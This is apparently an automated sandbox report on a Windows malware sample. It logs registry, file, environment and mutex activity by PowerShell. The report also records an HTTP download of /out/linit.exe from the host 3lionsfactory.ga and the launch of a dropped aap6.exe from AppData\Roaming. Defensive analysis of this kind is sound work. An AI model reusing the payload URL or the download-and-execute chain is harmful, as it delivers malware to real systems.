| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 53 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 30 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 11 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 48 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 | |
| Write | CONOUT$ | size = 77 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 18 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 30 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 14 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 28 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 | |
| Write | - | size = 4096 |
|
2 | |
| Write | - | size = 33164 |
|
1 | |
| Write | - | size = 65536 |
|
1 | |
| Write | - | size = 25588 |
|
1 | |
| Write | - | size = 27600 |
|
1 | |
| Write | - | size = 15180 |
|
1 |
Registry (219)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe | show_window = 99283024 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XABNCPUWKW |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
2 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
9 | |
| Release | - |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
9 |
Environment (99)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
91 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\kFT6uTQW |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\kFT6uTQW |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = 3lionsfactory.ga, address_out = 164.160.128.121 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 99 bytes |
| Total Data Received | 240.25 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 3lionsfactory.ga |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | USR-KL |
| Server Name | 3lionsfactory.ga |
| Server Port | 80 |
| Data Sent | 99 |
| Data Received | 246015 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = USR-KL, access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = 3lionsfactory.ga, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /out/linit.exe |
|
1 | |
| Send HTTP Request | headers = host: 3lionsfactory.ga, connection: Keep-Alive, user-agent: USR-KL, url = 3lionsfactory.ga/out/linit.exe |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 44 |
|
1 | |
| Read Response | size = 65536, size_out = 53820 |
|
1 | |
| Read Response | size = 65536, size_out = 2760 |
|
1 | |
| Read Response | size = 65536, size_out = 34500 |
|
1 | |
| Read Response | size = 65536, size_out = 65536 |
|
1 | |
| Read Response | size = 65536, size_out = 704 |
|
1 | |
| Read Response | size = 65536, size_out = 28980 |
|
1 | |
| Read Response | size = 55575, size_out = 27600 |
|
1 | |
| Read Response | size = 27975, size_out = 15180 |
|
1 | |
| Read Response | size = 12795, size_out = 12795 |
|
1 |
Process #3: aap6.exe
376
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\kft6utqw\appdata\roaming\aap6.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:53, Reason: Child Process |
| Unmonitor | End Time: 00:16:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:14:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9f8 |
| Parent PID | 0x960 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9FC
0x
A00
0x
A04
0x
A0C
0x
A18
0x
A24
0x
A28
0x
A2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
